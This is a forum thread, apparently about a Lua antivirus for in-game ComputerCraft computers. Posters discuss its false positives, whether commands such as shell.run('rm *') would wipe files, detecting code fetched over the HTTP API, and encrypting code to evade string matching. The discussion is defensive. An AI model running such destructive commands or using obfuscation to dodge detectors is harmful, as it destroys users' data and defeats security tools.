Jump to content




BLAST AntiMalware Suite - 'Yet another' string.find antivirus

lua

24 replies to this topic

#21 Luca_S

  • Members
  • 407 posts
  • LocationGermany

Posted 26 August 2016 - 09:02 PM

It detects itself(Worm.Deleter.a) because of local ignore={disk=true,rom=true}
Wtf this can't be right....

Also it doesn't detect fs.delete("*") as a virus?

#22 MKlegoman357

  • Members
  • 1,170 posts
  • LocationKaunas, Lithuania

Posted 28 August 2016 - 08:48 PM

View PostLuca_S, on 26 August 2016 - 09:02 PM, said:

Also it doesn't detect fs.delete("*") as a virus?

That doesn't work, all fs functions (with the exception of fs.find()) don't handle wildcards. But shell.run("rm *") would probably be dangerous.

#23 manu_03

  • Members
  • 84 posts
  • LocationSpain

Posted 28 August 2016 - 09:19 PM

You could scan the file for the HTTP API. For example, running the code from mysite.com/myfile where myfile is a virus.

#24 manu_03

  • Members
  • 84 posts
  • LocationSpain

Posted 28 August 2016 - 09:25 PM

Somewhere in the past I saw a program that encrypts your code to make it hidden. A virus maker could use it to avoid string.find warnings. You should start working on a sandbox mode that replaces most of unsafe functions to function()end and makes a log with the performed actions

#25 minebuild02

  • Members
  • 97 posts

Posted 05 September 2016 - 01:29 PM

View PostLuca_S, on 26 August 2016 - 09:02 PM, said:

It detects itself(Worm.Deleter.a) because of local ignore={disk=true,rom=true}
Wtf this can't be right....

Also it doesn't detect fs.delete("*") as a virus?
It does detect itself, yes.

View Postmanu_03, on 28 August 2016 - 09:19 PM, said:

You could scan the file for the HTTP API. For example, running the code from mysite.com/myfile where myfile is a virus.
The RTS driver has a firewall feature, it scans for access to dangerous files

View Postmanu_03, on 28 August 2016 - 09:25 PM, said:

Somewhere in the past I saw a program that encrypts your code to make it hidden. A virus maker could use it to avoid string.find warnings. You should start working on a sandbox mode that replaces most of unsafe functions to function()end and makes a log with the performed actions
PM me with any known code signatures





1 user(s) are reading this topic

0 members, 1 guests, 0 anonymous users